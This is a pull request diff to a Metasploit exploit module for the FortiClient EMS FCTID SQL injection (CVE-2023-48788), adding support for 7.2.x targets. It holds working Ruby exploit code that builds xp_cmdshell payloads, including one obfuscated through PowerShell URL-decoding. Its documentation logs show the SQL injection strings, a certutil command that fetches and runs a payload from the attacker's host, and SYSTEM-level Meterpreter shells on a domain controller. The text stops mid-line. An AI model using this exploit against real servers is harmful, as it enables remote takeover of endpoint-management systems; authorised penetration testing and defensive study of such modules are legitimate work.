### PR TITLE
FortiClient EMS FCTID SQLi to RCE fix for 7.2.x version range

### DIFF
--- a/documentation/modules/exploit/windows/http/forticlient_ems_fctid_sqli.md
+++ b/documentation/modules/exploit/windows/http/forticlient_ems_fctid_sqli.md
@@ -167,7 +167,7 @@ Meterpreter     : x64/windows
 meterpreter >
 ```
 
-# FortiClientEndpointManagementServer_7.2.2.0879_x64.exe running on Windows Server 2019 (Domain Controller)
+### FortiClientEndpointManagementServer_7.2.2.0879_x64.exe running on Windows Server 2019 (Domain Controller)
 ```
 msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > set rhosts 172.16.199.200
 rhosts => 172.16.199.200

--- a/documentation/modules/exploit/windows/http/forticlient_ems_fctid_sqli.md
+++ b/documentation/modules/exploit/windows/http/forticlient_ems_fctid_sqli.md
@@ -71,7 +71,7 @@ and download and install the .msi package. Once installed correctly you should s
 1. Receive a Meterpreter session running in the context of `NT AUTHORITY\SYSTEM`
 
 ## Scenarios
-### FortiClient EMS 7.07.0398_x64 running on Windows Server 2019 (Domain Controller)
+### FortiClientEndpointManagementServer_7.0.7.0398_x64.exe running on Windows Server 2019 (Domain Controller)
 ```
 msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > set rhosts 172.16.199.200
 rhosts => 172.16.199.200
@@ -101,7 +101,7 @@ Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):
    FETCH_URIPATH                        no        Local URI to use for serving payload
    FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
    LHOST               172.16.199.1     yes       The listen address (an interface may be specified)
-   LPORT               8383             yes       The listen port
+   LPORT               4444             yes       The listen port
 
 
 Exploit target:
@@ -114,32 +114,156 @@ Exploit target:
 
 View the full module info with the info, or info -d command.
 
-msf6 exploit(windows/http/forticlient_ems_fctid_sqli) >
+msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > set verbose true
+verbose => true
 msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > run
 [*] Reloading module...
 
-[*] Started reverse TCP handler on 172.16.199.1:8383
+[*] Command to run on remote host: certutil -urlcache -f http://172.16.199.1:8080/-LHoYC22ccefBZaLFchCEQ %TEMP%\pzGnmDqDGUOb.exe & start /B %TEMP%\pzGnmDqDGUOb.exe
+[*] Fetch handler listening on 172.16.199.1:8080
+[*] HTTP server started
+[*] Adding resource /-LHoYC22ccefBZaLFchCEQ
+[*] Started reverse TCP handler on 172.16.199.1:4444
 [*] 172.16.199.200:8013 - Running automatic check ("set AutoCheck false" to disable)
-[+] 172.16.199.200:8013 - The target is vulnerable. The SQLi has been exploited successfully
-[+] 172.16.199.200:8013 - The SQLi: ' OR 1=1; exec master.dbo.sp_configure 'show advanced options', 1;-- was executed successfully
-[+] 172.16.199.200:8013 - The SQLi: ' OR 1=1; reconfigure;-- was executed successfully
-[+] 172.16.199.200:8013 - The SQLi: ' OR 1=1; exec master.dbo.sp_configure 'xp_cmdshell',1;-- was executed successfully
-[+] 172.16.199.200:8013 - The SQLi: ' OR 1=1; reconfigure;-- was executed successfully
+[*] 172.16.199.200:8013 - Sending the following message:
+ MSG_HEADER: FCTUID=CBE8FC122B1A46D18C3541E1A8EFF7BD
+SIZE=    124
+X-FCCK-PROBE: PROBE_FEATURE_BITMAP0|1|
+X-FCCK-PROBE-END
+
+
+[*] 172.16.199.200:8013 - The response received was: FCPROBERPLY: FGT|FCTEMS0000125975:dc2.kerberos.issue|FEATURE_BITMAP|7|EMSVER|7000007|
+
+[+] 172.16.199.200:8013 - The target appears to be vulnerable. Version detected: 7.0.7
+[*] 172.16.199.200:8013 - Returning SYSINFO for 7.0 target
+[*] 172.16.199.200:8013 - Sending the following message:
+ MSG_HEADER: FCTUID=';EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; DECLARE @SQL VARCHAR(128) = CONVERT(VARCHAR(MAX), 0X636572747574696c202d75726c6361636865202d6620687474703a2f2f3137322e31362e3139392e313a383038302f2d4c486f5943323263636566425a614c466368434551202554454d50255c707a476e6d44714447554f622e6578652026207374617274202f42202554454d50255c707a476e6d44714447554f622e657865); exec master.dbo.xp_cmdshell @sql;--
+SIZE=     1900
+
+X-FCCK-REGISTER: SYSINFO||QVZTSUdfVkVSPTEuMDAwMDAKUkVHX0tFWT1fCkVQX09OTkVUQ0hLU1VNPTAKQVZFTkdfVkVSPTYuMDAyNjYKREhDUF9TRVJWRVI9Tm9uZQpGQ1RPUz1XSU42NApWVUxTSUdfVkVSPTEuMDAwMDAKRkNUVkVSPTcuMC43LjA4NzkKQVBQU0lHX1ZFUj0xMy4wMDM2NApVU0VSPUFkbWluaXN0cmF0b3IKQVBQRU5HX1ZFUj00LjAwMDgyCkFWQUxTSUdfVkVSPTAuMDAwMDAKVlVMRU5HX1ZFUj0yLjAwMDMyCk9TVkVSPU1pY3Jvc29mdCBXaW5kb3dzIFNlcnZlciAyMDE5ICwgNjQtYml0IChidWlsZCAxNzc2MykKQ09NX01PREVMPVZNd2FyZSBWaXJ0dWFsIFBsYXRmb3JtClJTRU5HX1ZFUj0xLjAwMDIwCkFWX1BST1RFQ1RFRD0wCkFWQUxFTkdfVkVSPTAuMDAwMDAKUEVFUl9JUD0KRU5BQkxFRF9GRUFUVVJFX0JJVE1BUD00OQpFUF9PRkZORVRDSEtTVU09MApJTlNUQUxMRURfRkVBVFVSRV9CSVRNQVA9MTU4NTgzCkVQX0NIS1NVTT0wCkhJRERFTl9GRUFUVVJFX0JJVE1BUD0xNTU5NDMKRElTS0VOQz0KSE9TVE5BTUU9Q1lCRVItUkVUUUIxRkxQCkFWX1BST0RVQ1Q9CkZDVF9TTj1GQ1Q4MDAxNjM4ODQ4NjUxCklOU1RBTExVSUQ9QjRGNDQ1MEQtMTA4NS00RUIyLTkzMzItRkNCMDVFNzExRDE3Ck5XSUZTPUV0aGVybmV0MHwyMC4xNTQuOS40fGM0OmZjOjEyOmIzOjI3OmVmfDIxOS4xMDIuMzYuMjIwfGExOjhjOmJjOjBjOjJmOmE5fDF8KnwwClVUQz0xNzEwMjcxNzc0ClBDX0RPTUFJTj0KQ09NX01BTj1WTXdhcmUsIEluYy4KQ1BVPUludGVsKFIpIFhlb24oUikgU2lsdmVyIDQyMTUgQ1BVIEAgMi41MEdIegpNRU09MTIyODcKSEREPTk5CkNPTV9TTj1WTXdhcmUtNDIgMDQgZWQgMmQgNjQgZTggMGIgMTQtNDUgZTkgZTQgZjYgNWEgYzcgNjcgODIKRE9NQUlOPQpXT1JLR1JPVVA9V09SS0dST1VQClVTRVJfU0lEPVMtMS01LTIxLTMwLTUwLTAtNTAwCkdST1VQX1RBRz0KQURHVUlEPQpFUF9GR1RDSEtTVU09MApFUF9SVUxFQ0hLU1VNPTAKV0ZfRklMRVNDSEtTVU09MApFUF9BUFBDVFJMQ0hLU1VNPTAK
+
+X-FCCK-REGISTER-END
+
+
+[*] Client 172.16.199.200 requested /-LHoYC22ccefBZaLFchCEQ
+[*] Sending payload to 172.16.199.200 (Microsoft-CryptoAPI/10.0)
+[*] Client 172.16.199.200 requested /-LHoYC22ccefBZaLFchCEQ
+[*] Sending payload to 172.16.199.200 (CertUtil URL Agent)
 [*] Sending stage (201798 bytes) to 172.16.199.200
-[+] 172.16.199.200:8013 - The SQLi: ' OR 1=1; DECLARE @SQL VARCHAR(120) = CONVERT(VARCHAR(MAX), 0X636572747574696c202d75
-726c6361636865202d6620687474703a2f2f3137322e31362e3139392e313a383038302f7a524b42764743776d624662474c46336c4e6f486d772025
-54454d50255c6a744d45695362632e6578652026207374617274202f42202554454d50255c6a744d45695362632e657865); exec master.dbo.xp_cmdshell @sql;-- was executed successfully
-[*] Meterpreter session 8 opened (172.16.199.1:8383 -> 172.16.199.200:57847) at 2024-04-11 14:00:22 -0700
+[*] 172.16.199.200:8013 - The response received was:
+[+] 172.16.199.200:8013 - The SQLi: ';EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; DECLARE @SQL VARCHAR(128) = CONVERT(VARCHAR(MAX), 0X636572747574696c202d75726c6361636865202d6620687474703a2f2f3137322e31362e3139392e313a383038302f2d4c486f5943323263636566425a614c466368434551202554454d50255c707a476e6d44714447554f622e6578652026207374617274202f42202554454d50255c707a476e6d44714447554f622e657865); exec master.dbo.xp_cmdshell @sql;-- was executed successfully
+[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.200:50409) at 2024-07-24 09:35:07 -0700
 
 meterpreter > getuid
-syServer username: NT AUTHORITY\SYSTEM
+Server username: NT AUTHORITY\SYSTEM
 meterpreter > sysinfo
 Computer        : DC2
 OS              : Windows Server 2019 (10.0 Build 17763).
 Architecture    : x64
 System Language : en_US
 Domain          : KERBEROS
-Logged On Users : 16
+Logged On Users : 9
+Meterpreter     : x64/windows
+meterpreter >
+```
+
+# FortiClientEndpointManagementServer_7.2.2.0879_x64.exe running on Windows Server 2019 (Domain Controller)
+```
+msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > set rhosts 172.16.199.200
+rhosts => 172.16.199.200
+msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > set lhost 172.16.199.1
+lhost => 172.16.199.1
+msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > set verbose true
+verbose => true
+msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > options
+
+Module options (exploit/windows/http/forticlient_ems_fctid_sqli):
+
+   Name    Current Setting  Required  Description
+   ----    ---------------  --------  -----------
+   RHOSTS  172.16.199.200   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT   8013             yes       The target port (TCP)
+   VHOST                    no        HTTP server virtual host
+
+
+Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   FETCH_COMMAND       CERTUTIL         yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      rixdOwaGgW       no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
+   LHOST               172.16.199.1     yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic Target
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(windows/http/forticlient_ems_fctid_sqli) > run
+
+[*] Command to run on remote host: certutil -urlcache -f http://172.16.199.1:8080/-LHoYC22ccefBZaLFchCEQ %TEMP%\xqUdZSzoE.exe & start /B %TEMP%\xqUdZSzoE.exe
+[*] Fetch handler listening on 172.16.199.1:8080
+[*] HTTP server started
+[*] Adding resource /-LHoYC22ccefBZaLFchCEQ
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] 172.16.199.200:8013 - Running automatic check ("set AutoCheck false" to disable)
+[*] 172.16.199.200:8013 - Sending the following message:
+ MSG_HEADER: FCTUID=CBE8FC122B1A46D18C3541E1A8EFF7BD
+SIZE=    124
+X-FCCK-PROBE: PROBE_FEATURE_BITMAP0|1|
+X-FCCK-PROBE-END
+
+
+[*] 172.16.199.200:8013 - The response received was: FCPROBERPLY: FGT|FCTEMS0000127184:dc2.kerberos.issue|FEATURE_BITMAP|7|EMSVER|7002002|PROTO_VERSION|1.0.0|PERCON|1|
+
+[+] 172.16.199.200:8013 - The target appears to be vulnerable. Version detected: 7.2.2
+[*] 172.16.199.200:8013 - Returning SYSINFO for 7.2 target
+[*] 172.16.199.200:8013 - Sending the following message:
+ MSG_HEADER: FCTUID=';EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'POWERSHELL.EXE -COMMAND ""Add-Type -AssemblyName System.Web; CMD.EXE /C ([SYSTEM.WEB.HTTPUTILITY]::URLDECODE("""%63%65%72%74%75%74%69%6C%20%2D%75%72%6C%63%61%63%68%65%20%2D%66%20%68%74%74%70%3A%2F%2F%31%37%32%2E%31%36%2E%31%39%39%2E%31%3A%38%30%38%30%2F%2D%4C%48%6F%59%43%32%32%63%63%65%66%42%5A%61%4C%46%63%68%43%45%51%20%25%54%45%4D%50%25%5C%78%71%55%64%5A%53%7A%6F%45%2E%65%78%65%20%26%20%73%74%61%72%74%20%2F%42%20%25%54%45%4D%50%25%5C%78%71%55%64%5A%53%7A%6F%45%2E%65%78%65"""))""';--
+IP=172.16.199.151
+MAC=00-0c-29-51-f7-4d
+FCT_ONNET=0
+CAPS=131071
+VDOM=Default
+EC_QUARANTINED=0
+SIZE=     2259
+
+X-FCCK-REGISTER:SYSINFO|RkNUT1M9V0lONjQKT1NWRVI9TWljcm9zb2Z0IFdpbmRvd3MgMTAgUHJvZmVzc2lvbmFsIEVkaXRpb24sIDY0LWJpdCAoYnVpbGQgMTkwNDUpClJTRU5HX1ZFUj0xLjAwMTgyCkNPTV9NT0RFTD1WTXdhcmU3LDEKQVZTSUdfVkVSPTEuMDAwMDAKVVRDPTE3MjE3NTY2MjYKUENfRE9NQUlOPWtlcmJlcm9zLmlzc3VlCkNPTV9NQU49Vk13YXJlLCBJbmMuCkNQVT1JbnRlbChSKSBDb3JlKFRNKSBpNy05NzUwSCBDUFUgQCAyLjYwR0h6CkNPTV9TTj1WTXdhcmUtNTYgNGQgOGEgZDUgN2IgMzkgM2IgMGQtMzMgYzYgMjUgNmEgZTQgNTEgZjcgNGQKREhDUF9TRVJWRVI9Tm9uZQpGQ1RWRVI9Ny4yLjIuMDg2NApFUF9PTk5FVENIS1NVTT0wCkFWRU5HX1ZFUj02LjAwMjg3CkFQUFNJR19WRVI9MjguMDA4MzEKVVNFUj1tc2Z1c2VyCkFQUEVOR19WRVI9NC4wMDA4MgpWVUxTSUdfVkVSPTEuMDA3MDgKQVZBTFNJR19WRVI9MC4wMDAwMApWVUxFTkdfVkVSPTIuMDAwMzcKQVZfUFJPVEVDVEVEPTEKQVZBTEVOR19WRVI9MC4wMDAwMApQRUVSX0lQPTE2Mi4xNTYuNTguMTk5CkVOQUJMRURfRkVBVFVSRV9CSVRNQVA9MTYKRVBfT0ZGTkVUQ0hLU1VNPTAKSU5TVEFMTEVEX0ZFQVRVUkVfQklUTUFQPTQyMDcyNwpFUF9DSEtTVU09MApISURERU5fRkVBVFVSRV9CSVRNQVA9NDE4MDg3CkdST1VQX1RBRz0KRU5BQkxFRF9BUFBTPTAKSU5TVEFMTEVEX0FQUFM9MApESVNLRU5DPQpIT1NUTkFNRT1jbGllbnQKQVZfUFJPRFVDVD1NaWNyb3NvZnQgRGVmZW5kZXIgQW50aXZpcnVzCkZDVF9TTj1GQ1Q4MDAzMTczNjg5NzMwCklOU1RBTExVSUQ9RjQxNkU5QjctQzAxQy00M0RFLTk1RjEtMkJGQ0FEOTAzNTFECk5XSUZTPUV0aGVybmV0MHwxNzIuMTYuMTk5LjE1MXwwMC0wYy0yOS01MS1mNy00ZHwxNzIuMTYuMTk5LjJ8MDAtNTAtNTYtZTgtMDgtNmF8MXwqfDAKTUVNPTE2MzgzCkhERD0xMTkKRE9NQUlOPQpXT1JLR1JPVVA9ClVTRVJfU0lEPVMtMS01LTIxLTE3NjAyNTQxOTEtMzcyMzY0MzQyLTMyNDQ0NTM2ODctMTAwMApBREdVSUQ9CkVQX0ZHVENIS1NVTT0wCkVQX1JVTEVDSEtTVU09MApXRl9GSUxFU0NIS1NVTT0wCkVQX0FQUENUUkxDSEtTVU09MAo=|
+
+X-FCCK-REGISTER-END
+
+
+[*] Client 172.16.199.200 requested /-LHoYC22ccefBZaLFchCEQ
+[*] Sending payload to 172.16.199.200 (Microsoft-CryptoAPI/10.0)
+[*] Client 172.16.199.200 requested /-LHoYC22ccefBZaLFchCEQ
+[*] Sending payload to 172.16.199.200 (CertUtil URL Agent)
+[*] Sending stage (201798 bytes) to 172.16.199.200
+[*] 172.16.199.200:8013 - The response received was:
+[+] 172.16.199.200:8013 - The SQLi: ';EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'POWERSHELL.EXE -COMMAND ""Add-Type -AssemblyName System.Web; CMD.EXE /C ([SYSTEM.WEB.HTTPUTILITY]::URLDECODE("""%63%65%72%74%75%74%69%6C%20%2D%75%72%6C%63%61%63%68%65%20%2D%66%20%68%74%74%70%3A%2F%2F%31%37%32%2E%31%36%2E%31%39%39%2E%31%3A%38%30%38%30%2F%2D%4C%48%6F%59%43%32%32%63%63%65%66%42%5A%61%4C%46%63%68%43%45%51%20%25%54%45%4D%50%25%5C%78%71%55%64%5A%53%7A%6F%45%2E%65%78%65%20%26%20%73%74%61%72%74%20%2F%42%20%25%54%45%4D%50%25%5C%78%71%55%64%5A%53%7A%6F%45%2E%65%78%65"""))""';-- was executed successfully
+[*] Meterpreter session 4 opened (172.16.199.1:4444 -> 172.16.199.200:28146) at 2024-07-23 16:17:56 -0700
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : DC2
+OS              : Windows Server 2019 (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : KERBEROS
+Logged On Users : 9
 Meterpreter     : x64/windows
 meterpreter >
 ```

--- a/modules/exploits/windows/http/forticlient_ems_fctid_sqli.rb
+++ b/modules/exploits/windows/http/forticlient_ems_fctid_sqli.rb
@@ -203,13 +203,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def get_message(sqli)
     message = "MSG_HEADER: FCTUID={SQLI_PLACEHOLDER}\n"
-    message << "SIZE=     {SIZE_PLACEHOLDER}\n\r"
+    message << "SIZE=     {SIZE_PLACEHOLDER}\r\n"
     message << "\n"
     # For 7.0 versions the register info gets placed after two pipe operators, for 7.2 it gets placed in between.
     if @version >= Rex::Version.new('7.2')
       message << "X-FCCK-REGISTER:SYSINFO|#{get_register_info}|\r\n"
     else
-      message << "X-FCCK-REGISTER: SYSINFO||#{get_register_info}\n"
+      message << "X-FCCK-REGISTER:SYSINFO||#{get_register_info}\r\n"
     end
     message << "\n"
     message << 'X-FCCK-REGISTER-END'
@@ -249,10 +249,6 @@ class MetasploitModule < Msf::Exploit::Remote
     CheckCode::Safe("Version detected: #{@version}")
   end
 
-  def fully_url_encode(string)
-    string.chars.map { |char| '%' + char.ord.to_s(16).upcase }.join
-  end
-
   def exploit
     # Things to note:
     # 1. xp_cmdshell is disabled by default so we must enable it.
@@ -265,7 +261,7 @@ class MetasploitModule < Msf::Exploit::Remote
     @version ||= get_version
 
     if @version >= Rex::Version.new('7.2')
-      pload = "EXEC xp_cmdshell 'POWERSHELL.EXE -COMMAND \"\"Add-Type -AssemblyName System.Web; CMD.EXE /C ([SYSTEM.WEB.HTTPUTILITY]::URLDECODE(\"\"\"#{fully_url_encode(payload.encoded)}\"\"\"))\"\"'"
+      pload = "EXEC xp_cmdshell 'POWERSHELL.EXE -COMMAND \"\"Add-Type -AssemblyName System.Web; CMD.EXE /C ([SYSTEM.WEB.HTTPUTILITY]::URLDECODE(\"\"\"#{Rex::Text.uri_encode(payload.encoded, 'hex-all')}\"\"\"))\"\"'"
     else
       pload = "DECLARE @SQL VARCHAR(#{payload.encoded.length}) = CONVERT(VARCHAR(MAX), 0X#{payload.encoded.unpack('H*').first}); exec xp_cmdshell @sql"
     end

--- a/modules/exploits/windows/http/forticlient_ems_fctid_sqli.rb
+++ b/modules/exploits/windows/http/forticlient_ems_fctid_sqli.rb
@@ -44,6 +44,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'References' => [
           [ 'URL', 'https://www.horizon3.ai/attack-research/attack-blogs/cve-2023-48788-fortinet-forticlientems-sql-injection-deep-dive/'],
+          [ 'URL', 'https://www.horizon3.ai/attack-research/attack-blogs/cve-2023-48788-revisiting-fortinet-forticlient-ems-to-exploit-7-2-x/'],
           [ 'URL', 'https://github.com/horizon3ai/CVE-2023-48788/blob/main/CVE-2023-48788.py'],
           [ 'CVE', '2023-48788']
         ],
@@ -70,71 +71,149 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_register_info
-    register_info = <<~REGISTER_INFO
-      AVSIG_VER=1.00000
-      REG_KEY=_
-      EP_ONNETCHKSUM=0
-      AVENG_VER=6.00266
-      DHCP_SERVER=None
-      FCTOS=WIN64
-      VULSIG_VER=1.00000
-      FCTVER=7.0.7.0345
-      APPSIG_VER=13.00364
-      USER=Administrator
-      APPENG_VER=4.00082
-      AVALSIG_VER=0.00000
-      VULENG_VER=2.00032
-      OSVER=Microsoft Windows Server 2019 , 64-bit (build 17763)
-      COM_MODEL=VMware Virtual Platform
-      RSENG_VER=1.00020
-      AV_PROTECTED=0
-      AVALENG_VER=0.00000
-      PEER_IP=
-      ENABLED_FEATURE_BITMAP=49
-      EP_OFFNETCHKSUM=0
-      INSTALLED_FEATURE_BITMAP=158583
-      EP_CHKSUM=0
-      HIDDEN_FEATURE_BITMAP=155943
-      DISKENC=
-      HOSTNAME=CYBER-RETQB1FLP
-      AV_PRODUCT=
-      FCT_SN=FCT8001638848651
-      INSTALLUID=#{Faker::Internet.uuid.upcase}
-      NWIFS=Ethernet0|#{Faker::Internet.ip_v4_address}|#{Faker::Internet.mac_address}|#{Faker::Internet.ip_v4_address}|#{Faker::Internet.mac_address}|1|*|0
-      UTC=1710271774
-      PC_DOMAIN=
-      COM_MAN=VMware, Inc.
-      CPU=Intel(R) Xeon(R) Silver 4215 CPU @ 2.50GHz
-      MEM=12287
-      HDD=99
-      COM_SN=VMware-42 04 ed 2d 64 e8 0b 14-45 e9 e4 f6 5a c7 67 82
-      DOMAIN=
-      WORKGROUP=WORKGROUP
-      USER_SID=S-1-5-21-#{rand(9) * 10}-#{rand(9) * 10}-#{rand(9) * 10}-500
-      GROUP_TAG=
-      ADGUID=
-      EP_FGTCHKSUM=0
-      EP_RULECHKSUM=0
-      WF_FILESCHKSUM=0
-      EP_APPCTRLCHKSUM=0
-    REGISTER_INFO
+    if @version >= Rex::Version.new('7.2')
+      vprint_status("Returning SYSINFO for 7.2 target")
+      register_info = <<~REGISTER_INFO
+        FCTOS=WIN64
+        OSVER=Microsoft Windows 10 Professional Edition, 64-bit (build 19045)
+        RSENG_VER=1.00182
+        COM_MODEL=VMware7,1
+        AVSIG_VER=1.00000
+        UTC=1721756626
+        PC_DOMAIN=kerberos.issue
+        COM_MAN=VMware, Inc.
+        CPU=Intel(R) Core(TM) i7-9750H CPU @ 2.60GHz
+        COM_SN=VMware-56 4d 8a d5 7b 39 3b 0d-33 c6 25 6a e4 51 f7 4d
+        DHCP_SERVER=None
+        FCTVER=7.2.2.0864
+        EP_ONNETCHKSUM=0
+        AVENG_VER=6.00287
+        APPSIG_VER=28.00831
+        USER=msfuser
+        APPENG_VER=4.00082
+        VULSIG_VER=1.00708
+        AVALSIG_VER=0.00000
+        VULENG_VER=2.00037
+        AV_PROTECTED=1
+        AVALENG_VER=0.00000
+        PEER_IP=162.156.58.199
+        ENABLED_FEATURE_BITMAP=16
+        EP_OFFNETCHKSUM=0
+        INSTALLED_FEATURE_BITMAP=420727
+        EP_CHKSUM=0
+        HIDDEN_FEATURE_BITMAP=418087
+        GROUP_TAG=
+        ENABLED_APPS=0
+        INSTALLED_APPS=0
+        DISKENC=
+        HOSTNAME=client
+        AV_PRODUCT=Microsoft Defender Antivirus
+        FCT_SN=FCT8003173689730
+        INSTALLUID=#{Faker::Internet.uuid.upcase}
+        NWIFS=Ethernet0|#{Faker::Internet.ip_v4_address}|#{Faker::Internet.mac_address}|#{Faker::Internet.ip_v4_address}|#{Faker::Internet.mac_address}|1|*|0
+        MEM=16383
+        HDD=119
+        DOMAIN=
+        WORKGROUP=
+        USER_SID=S-1-5-21-#{rand(9) * 10}-#{rand(9) * 10}-#{rand(9) * 10}-500
+        ADGUID=
+        EP_FGTCHKSUM=0
+        EP_RULECHKSUM=0
+        WF_FILESCHKSUM=0
+        EP_APPCTRLCHKSUM=0
+      REGISTER_INFO
+    else
+      vprint_status("Returning SYSINFO for 7.0 target")
+      register_info = <<~REGISTER_INFO
+        AVSIG_VER=1.00000
+        REG_KEY=_
+        EP_ONNETCHKSUM=0
+        AVENG_VER=6.00266
+        DHCP_SERVER=None
+        FCTOS=WIN64
+        VULSIG_VER=1.00000
+        FCTVER=7.0.7.0345
+        APPSIG_VER=13.00364
+        USER=Administrator
+        APPENG_VER=4.00082
+        AVALSIG_VER=0.00000
+        VULENG_VER=2.00032
+        OSVER=Microsoft Windows Server 2019 , 64-bit (build 17763)
+        COM_MODEL=VMware Virtual Platform
+        RSENG_VER=1.00020
+        AV_PROTECTED=0
+        AVALENG_VER=0.00000
+        PEER_IP=
+        ENABLED_FEATURE_BITMAP=49
+        EP_OFFNETCHKSUM=0
+        INSTALLED_FEATURE_BITMAP=158583
+        EP_CHKSUM=0
+        HIDDEN_FEATURE_BITMAP=155943
+        DISKENC=
+        HOSTNAME=CYBER-RETQB1FLP
+        AV_PRODUCT=
+        FCT_SN=FCT8001638848651
+        INSTALLUID=#{Faker::Internet.uuid.upcase}
+        NWIFS=Ethernet0|#{Faker::Internet.ip_v4_address}|#{Faker::Internet.mac_address}|#{Faker::Internet.ip_v4_address}|#{Faker::Internet.mac_address}|1|*|0
+        UTC=1710271774
+        PC_DOMAIN=
+        COM_MAN=VMware, Inc.
+        CPU=Intel(R) Xeon(R) Silver 4215 CPU @ 2.50GHz
+        MEM=12287
+        HDD=99
+        COM_SN=VMware-42 04 ed 2d 64 e8 0b 14-45 e9 e4 f6 5a c7 67 82
+        DOMAIN=
+        WORKGROUP=WORKGROUP
+        USER_SID=S-1-5-21-#{rand(9) * 10}-#{rand(9) * 10}-#{rand(9) * 10}-500
+        GROUP_TAG=
+        ADGUID=
+        EP_FGTCHKSUM=0
+        EP_RULECHKSUM=0
+        WF_FILESCHKSUM=0
+        EP_APPCTRLCHKSUM=0
+      REGISTER_INFO
+    end
     Rex::Text.encode_base64(register_info)
   end
 
-  def get_message(sqli)
-    message = "MSG_HEADER: FCTUID=CBE8FC122B1A46D18C3541E1A8EFF7BD{SQLI_PLACEHOLDER}\n"
-    message << "IP=127.0.0.1\n"
-    message << "MAC=#{Faker::Internet.mac_address}\n"
-    message << "FCT_ONNET=0\n"
-    message << "CAPS=32767\n"
-    message << "VDOM=default\n"
-    message << "EC_QUARANTINED=0\n"
+    def get_version
+    message = "MSG_HEADER: FCTUID=CBE8FC122B1A46D18C3541E1A8EFF7BD\n"
     message << "SIZE=    {SIZE_PLACEHOLDER}\n"
+    message << "X-FCCK-PROBE: PROBE_FEATURE_BITMAP0|1|\n"
+    message << 'X-FCCK-PROBE-END'
+    message << "\r\n"
+    message << "\r\n"
+    message_length = message.length
+    message_length = message_length - '{SIZE_PLACEHOLDER}'.length + message_length.to_s.length
+    message.gsub!('{SIZE_PLACEHOLDER}', message_length.to_s)
+
+    buf = send_message(message)
+    # Example response from a 7.2.2 target:
+    # FGT|FCTEMS0000127184:dc2|FEATURE_BITMAP|7|EMSVER|7002002|PROTO_VERSION|1.0.0|PERCON|1|
+    # 7.0.7:
+    # FGT|FCTEMS0000125975:dc2.kerberos.issue|FEATURE_BITMAP|7|EMSVER|7000007|
+    if buf =~ /EMSVER\|(\d{2})(\d{2})(\d{3})\|/
+      major = ($1.to_i / 10)
+      minor = $2.to_i
+      patch = $3.to_i
+      return Rex::Version.new("#{major}.#{minor}.#{patch}")
+    end
+    nil
+  end
+
+  def get_message(sqli)
+    message = "MSG_HEADER: FCTUID={SQLI_PLACEHOLDER}\n"
+    message << "SIZE=     {SIZE_PLACEHOLDER}\n\r"
     message << "\n"
-    message << "X-FCCK-REGISTER: SYSINFO||#{get_register_info}\n"
+    # For 7.0 versions the register info gets placed after two pipe operators, for 7.2 it gets placed in between.
+    if @version >= Rex::Version.new('7.2')
+      message << "X-FCCK-REGISTER:SYSINFO|#{get_register_info}|\r\n"
+    else
+      message << "X-FCCK-REGISTER: SYSINFO||#{get_register_info}\n"
+    end
+    message << "\n"
     message << 'X-FCCK-REGISTER-END'
-    message << "\r\n"
-    message << "\r\n"
+    message << "\r\n\r\n"
     message.gsub!('{SQLI_PLACEHOLDER}', sqli)
     message_length = message.length
     message_length = message_length - '{SIZE_PLACEHOLDER}'.length + message_length.to_s.length
@@ -142,9 +221,9 @@ class MetasploitModule < Msf::Exploit::Remote
     message
   end
 
-  def send_message(sqli)
-    message = get_message(sqli)
-    vprint_status("Sending the following message: #{message}")
+  def send_message(message)
+
+    vprint_status("Sending the following message:\n #{message}")
 
     buf = ''
     begin
@@ -161,11 +240,14 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    res = send_message("' OR 1=1; --")
-    return CheckCode::Vulnerable('The SQLi has been exploited successfully') if res.include?('KA_INTERVAL')
-    return CheckCode::Safe if res.include?("The FCT record doesn't exist")
 
-    CheckCode::Unknown("#{peer} - FmcDaemon.exe does not appear to be running on the endpoint targeted")
+    @version = get_version
+    return CheckCode::Unknown("#{peer} - Version info was unable to be extracted from the target. FmcDaemon.exe might not be running.") unless @version
+
+    if @version.between?(Rex::Version.new('7.2.0'), Rex::Version.new('7.2.2')) || @version.between?(Rex::Version.new('7.0.1'), Rex::Version.new('7.0.10'))
